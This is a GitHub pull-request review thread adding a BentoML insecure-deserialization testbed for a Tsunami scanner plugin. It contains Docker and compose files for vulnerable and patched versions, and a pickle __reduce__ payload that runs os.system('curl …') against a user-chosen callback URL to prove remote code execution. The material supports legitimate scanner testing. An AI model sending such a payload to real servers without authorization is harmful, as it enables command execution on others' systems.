bentoml insecure deserlization plugin
google/security-testbeds pull request #73
Opened 2024-07-29 13:58 UTC by secureness

Hi, according to my tsunami plugin: https://github.com/google/tsunami-security-scanner-plugins/pull/520

2024-08-15 18:34 UTC, lokiuox requested changes
Hey @secureness, thanks for your contribution!

I left a few comments on some things that can be improved.

2024-08-15 18:34 UTC, lokiuox commented on bentoml/service.py
> +        return result[0]['summary_text']
```suggestion
from __future__ import annotations
import bentoml

@bentoml.service(
    resources={"cpu": "2"},
    traffic={"timeout": 10},
)
class Summarization:
    def __init__(self) -> None:
        # Load model into pipeline
        pass

    @bentoml.api
    def summarize(self, text: str) -> str:
        return "Hello World"
```

This simplification removes the need for extra dependencies. I verified that this is still exploitable.

2024-08-15 18:34 UTC, lokiuox commented on bentoml/README.md
> +```
Can you please turn these in two docker compose files or similar?

I already had to do that to test the plugin, so you're free to copy-paste these (or create your own if you prefer):

`Dockerfile`
```Dockerfile
FROM python:3.10-alpine
RUN mkdir /workdir
WORKDIR /workdir
COPY service.py /workdir/
RUN apk add gcc python3-dev musl-dev linux-headers curl
ARG BENTOML_VERSION
RUN pip3 install bentoml==${BENTOML_VERSION}
CMD bentoml serve service:Summarization
```

`docker-compose-vulnerable.yml`
```yml
services:
  bentoml-vuln:
    build:
      context: .
      args:
        BENTOML_VERSION: 1.2.0
    ports:
      - "3000:3000"
```

`docker-compose-safe.yml`
```yml
services:
  bentoml-safe:
    build:
      context: .
      args:
        BENTOML_VERSION: 1.2.5
    ports:
      - "3000:3000"
```

2024-09-23 16:43 UTC, lokiuox commented on bentoml/exploit.py
> +        return (os.system, (f"curl {ip_address}:1337",))
```suggestion
url = input("Please specify the URL that will receive the callback: ")
print(f"curl {url}")
class P(object):
    def __reduce__(self):
        return (os.system, (f"curl {url}",))
```
I think it's better to let the user choose the full URL to receive the callback on, so that they can use an external service such as Burp Collaborator for this

2024-09-23 18:07 UTC, lokiuox commented
Thanks, looks good.

2024-10-14 18:38 UTC, lokiuox requested changes
Hey @secureness, I went to test the latest changes in your plugin, but the testbed doesn't work anymore, it's apparently due to a change in the latest version of pydantic. The change I suggested in this comment fixes it for me. Please check that it works and submit the change so I can approve your plugin.

2024-10-14 18:38 UTC, lokiuox commented on bentoml/Dockerfile
> +RUN pip3 install bentoml==${BENTOML_VERSION}
```suggestion
RUN pip3 install pydantic==2.8.2 bentoml==${BENTOML_VERSION}
```

2024-10-22 12:11 UTC, tooryx approved these changes

2024-10-22 22:32 UTC, merged